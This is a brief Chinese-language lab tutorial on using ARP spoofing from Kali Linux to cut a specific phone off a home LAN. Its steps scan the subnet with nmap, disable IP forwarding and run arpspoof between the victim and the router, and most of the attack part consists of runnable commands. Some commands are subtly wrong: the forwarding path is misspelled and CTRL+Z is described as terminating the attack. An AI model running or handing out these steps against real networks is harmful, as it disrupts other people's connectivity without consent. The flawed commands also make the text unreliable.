一、功能：

使用arp中间人攻击使当前局域网中的指定设备停止上网

二、环境：

攻击者：kali IP：192.168.124.84

受害者：nova7se5G IP：192.168.124.75

三、实验开始：

1、打开攻击者kali：

使用ifconfig查看当前IP地址与网段：

ifconfig
或者
ip a

kali的IP地址为：192.168.124.84

可以得到当前网段的IP地址：192.168.124.1/24

2、使用nmap探测靶机：

使用nmap扫描当前网段192.168.124.1/24的所有存活的主机：

nmap 192.168.124.1-255
或者
nmap -sP 192.168.124.1/24

得到当前路由器的IP地址：192.168.124.1

同时得到受害者的IP地址：192.168.124.75

3、开始攻击：

打开kali执行以下命令：

echo 0 > /proc/sys/net/ipv4/ip_forwar

使用arpspoof进行攻击：

-i 为指定网卡 -t 为指定受害者的IP地址 -r 为指定当前网段的路由器IP地址

arpspoof -i eth0 -t 192.168.124.75 -r 192.168.124.1

使用CTRL+Z回车终止

4、实验效果：

打开受害者手机：发送以下信息

发现无法发送，起到了断网效果

实验总结：

使用arp的中间人攻击可以到达使受害者无法上网的效果，在实验中还是有小部分流量可以发送成功，但是可以达到实验效果